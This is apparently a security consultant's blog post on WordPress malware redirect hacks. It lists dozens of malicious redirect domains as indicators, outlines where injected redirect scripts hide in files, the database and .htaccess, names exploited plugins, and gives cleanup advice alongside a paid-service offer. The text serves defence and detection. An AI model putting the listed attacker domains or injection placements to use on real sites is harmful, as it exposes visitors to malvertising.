WordPress Redirect Hack
Many current WordPress hacks that I’m seeing are redirecting all visitors to a foreign domain. These “malware redirects” or “spam forwarding” are being used to send malvertising to all your website visitors.
This article looks at how this redirection occurs and what variations are possible. Because the redirects do not always occur on every visit (and are often deliberately hidden from admin users!), this type of hack may remain undetected for a long time.
One thing is certain: Remedial action must be taken urgently so that valuable traffic is not lost and your customers are not attacked.
Update: August 3, 2024. Balada Injector Hackers are increasingly active again, and many websites are currently being attacked. Litespeed Cache is often to blame; this needs to be deactivated and then all backdoors removed.
Update: 18/08/2023: There are still a lot of redirect attacks going on – mainly because of the same problems due to insecure plugins and missing updates!
If you don’t want to waste any time, and want to protect your website visitors please contact me for immediate professional help & cleanup.
Common Domain names actively used in WordPress redirects
egocoattell.live
redfiretobind.com
bluefiretobind.com
rdntocdns.com
taskscompletedlists.com
recordsbluemountain.com
roselinetoday.com
bluelitetoday.com
redselectorpage.com
blueselectorpage.com
greenstepcherry.com
bluestepcherry.com
decentralappps.com
linestoget.com
stratosbody.com
quartzquester.top
viqtorywins.com
clickandanalytics.com
predictivdisplay.com
firstblackphase.com
sortyellowapples.com
descriptionscripts.com
scriptsplatform.com
cdn.statisticline.com
desirebluestock.com
actraffic.com
importraffic.com
trackersline.com
violetlovelines.com
specialblueitems.com
weatherpillatform.com
admarketlocation.com
travelfornamewalking.ga
transandfiestas.ga
helpmart.ga
jQueryNS.com
legendarytable.com
greengoplatform.com
transportgoline.com
drakefollow.com
confirmacionsb.com
classicpartnerships.com
specialadves.com
lovegreenpencils.ga
linetoadsactive.com
secondaryinformtrand.com
donatelloflowfirstly.ga
hostingcloud.racing
lowerthenskyactive.ga
lowerbeforwarden.ml
polimer.xyz
deliverygoodstrategies.com
gabriellalovecats.com
watch-video.net
bnmjjwinf292.com
name0fbestway.com
declarebusinessgroup.ga
sinistermousemove.art
url-partners.g2afse.com
buyittraffic.com
cuttraffic.com
puttraffic.com
importtraffic.com
decimalprovehour5.live
trendopportunityfollow.ga
examhome.net
saskmade.net
stat.trackstatisticsss.com
sferverification.com
poponclick.info
train.developfirstline.com
letsmakeparty3.ga
beforwardplay.com
belaterbewasthere.com
waterflowpick24.live
2.8mono.biz
dontstopthismusics.com
lobbydesires.com
blackentertainments.com
fox.trackstatisticsss.com
graizoah.com
asoulrox.com
ofgogoatan.com
stivenfernando.com
fast.destinyfernandi.com
trackstatisticsss.com
check.resolutiondestin.com
dest.collectfasttracks.com
digestcolect.com
verybeatifulantony.com
gotosecond2.com
forwardmytraffic.com
crazytds.club
WordPress spam redirects – hiding places for the malware
In principle, automatic redirects can be placed in any file loaded by the WordPress system.
In addition, there are also frequent script injections directly into the database.
There are various hiding places for spam redirects that I’ve seen in the last months:
- Javascript injections in PHP files (especially in theme and plugin files)
- Javascript files, injected at the beginning of all JS files on server
- Script injections in pages and articles (wp-posts database table)
- URL of website (as set in wp-options database table) changed to hackers domain
- Modified .htaccess files (often in many folders)
- Via advertising networks (hacked ad servers)
In addition to the spam redirects there are always multiple backdoors added, and often several admin users are added to WordPress to allow the hackers full access even once the vulnerable plugins have been patched.
A partial list of vulnerable plugins being used
The vast majority of these attacks are targeted at vulnerabilities that were patched months or even years ago. If you have any of these plugins installed in your website make sure you are using the latest secure updated !
- Duplicator
- Page Builder by SiteOrigin
- ThemeGrill Demo Importer
- Profile Builder
- WP GDPR Compliance
- Coming Soon and Maintenance Mode
How do I avoid these problems?
As with most WordPress attacks, the solution is to update all your plugins and WordPress core regularly. Also make sure to remove (and not just deactivate) any plugins that are not required.
How to restore your website if you are infected
There are two ways to restore an infected website: by restoring a recent, clean backup or by removing all malware and backdoors that otherwise allow hackers to keep coming back.
- Restore a backup
Since these attacks generally infect 100 or even 1000 files as well as the database, the best recovery method is to delete the entire WordPress directory (make sure your backup is OK before doing this !!) and reinstall from a clean backup. Then also restore your database from a clean backup.
- Manually remove all malware and backdoors
If this is not possible you should contact a professional for help – with the right tools and knowledge the cleanup can be completed in 2-3 hours and your website can be put back online.
I can have your website clean, safe and online within hours for just US$149 (€129) – contact me now for immediate help!